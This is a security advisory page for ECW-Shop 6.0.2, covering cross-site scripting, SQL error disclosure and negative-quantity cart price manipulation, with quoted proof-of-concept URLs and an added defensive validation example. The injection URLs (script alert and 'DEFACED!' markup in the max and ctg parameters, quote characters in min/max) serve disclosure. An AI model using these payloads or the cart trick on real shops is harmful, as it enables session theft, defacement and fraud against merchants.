SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Commerce)  >   ECW-Shop
Vendors:   ECW-Shop
ECW-Shop Bugs Permit SQL Injection, Cross-Site Scripting, and Price Modification
SecurityTracker Alert ID:  1014734
SecurityTracker URL:  http://securitytracker.com/id/1014734
CVE Reference:   CVE-2005-2621, CVE-2005-2622, CVE-2005-2623
Updated:  Jun 8 2008
Original Entry Date:  Aug 19 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 6.0.2
Description:   Several vulnerabilities were reported in ECW-Shop. A remote user can modify the shopping cart total price. A remote user can inject SQL commands. A remote user can also conduct cross-site scripting attacks.

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary HTML to be executed by the target user's browser. The code will originate from the site running the ECW-Shop software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The 'max' and 'ctg' parameters are affected.

Some demonstration exploit URLs are provided:

http://[target]/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>

http://[target]/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&id=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=1&max=1

A remote user can supply the following URLs to cause the system to disclose system information in an error message:

http://[target]/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min='&max=1

http://[target]/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max='

It may be possible to inject SQL commands, but the report did not confirm SQL injection.

A remote user can add a negative quantity of an item to the shopping cart to cause the total price of the cart contents to be reduced by the appropriate amount.
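The following is an added example, not ECW-Shop code: a defensive handler for the three parameter classes the advisory names (the echoed 'ctg' and 'max' values, the numeric 'min'/'max' bounds that produced the MySQL error, and the cart quantity). Function names, the category-id format and the cart layout are assumptions made for illustration.

```python
# Added example (not ECW-Shop code). Names and field formats are assumed.
import html
import re

# Assumed: category ids look like "Cat_1"; anything else is rejected outright.
CATEGORY_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


class BadRequest(ValueError):
    """Raised for any parameter that fails validation."""


def parse_price_bound(value: str, name: str) -> int:
    """min/max must be non-negative integers. A lone quote (the advisory's
    min=' / max=' case) is rejected here, before it can reach the SQL layer
    or surface a mysql_num_rows() warning to the client."""
    if not re.fullmatch(r"\d{1,9}", value):
        raise BadRequest(f"{name} must be a non-negative integer")
    return int(value)


def validate_search(params: dict) -> dict:
    """Returns a cleaned copy of the search parameters or raises BadRequest.
    Cleaned values are still passed to the database as bound parameters,
    never concatenated into the query string."""
    ctg = params.get("ctg", "")
    if not CATEGORY_RE.fullmatch(ctg):
        raise BadRequest("ctg has an invalid format")
    lo = parse_price_bound(params.get("min", "0"), "min")
    hi = parse_price_bound(params.get("max", "0"), "max")
    if lo > hi:
        raise BadRequest("min exceeds max")
    return {"ctg": ctg, "min": lo, "max": hi}


def render_echo(field: str, value: str) -> str:
    """When a user value must be echoed into the page, escape it so that
    <H1> or <script> payloads render as literal text rather than markup."""
    return f"<p>Results for {field}: {html.escape(value, quote=True)}</p>"


def cart_total(prices: dict, quantities: dict) -> int:
    """Prices and the result are in cents. Each quantity must be a positive
    integer, so a line such as {'widget': -3} cannot subtract from the total."""
    total = 0
    for sku, qty in quantities.items():
        if sku not in prices:
            raise BadRequest(f"unknown item {sku}")
        if not isinstance(qty, int) or isinstance(qty, bool) or qty < 1:
            raise BadRequest(f"quantity for {sku} must be a positive integer")
        total += prices[sku] * qty
    return total
```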

The vendor was notified on June 8, 2005.

John Cobb discovered these vulnerabilities.

Impact:   A remote user can modify the shopping cart total price.

A remote user may be able to inject SQL commands.

A remote user can also conduct cross-site scripting attacks.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.soft4e.com/
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [NOBYTES.COM: #9] ECW Shop 6.0.2 - Multiple Vulnerabilities

Hello All,

I have discovered a number of remote vulnerabilities in: ECW Shop 6.0.2

Author's Site: http://www.soft4e.com/

ECW Shop is described by its authors as:

ECW-Shop - simple for use featured shopping cart with ability to use Excel
or Access format for database.

+-[Examples:]--------------------------------------------------+



[1]------------------------------------------------------------+

XSS: (This same problem was reported on version 5.5 by David S. Ferreira -
http://www.securityfocus.com/bid/9244)

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</script>

[2]------------------------------------------------------------+

Information Disclosure & Possible SQL Injection:

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min='&max=1
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max='

Error:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/search.php on line 109

[3]------------------------------------------------------------+

HTML Injection:

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>
http://www.victim.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&id=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=1&max=1

[4]------------------------------------------------------------+

Cart/Order Manipulation:

You can add negative quantity value items to your cart to gain credit.

Example:



+-[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 06/08/2005
Author(s) Informed on: 06/08/2005
Author(s) Response: NONE
Author(s) Fix: NONE


JohnC@NoBytes.com

http://www.NoBytes.com

Copyright 2019, SecurityGlobal.net LLC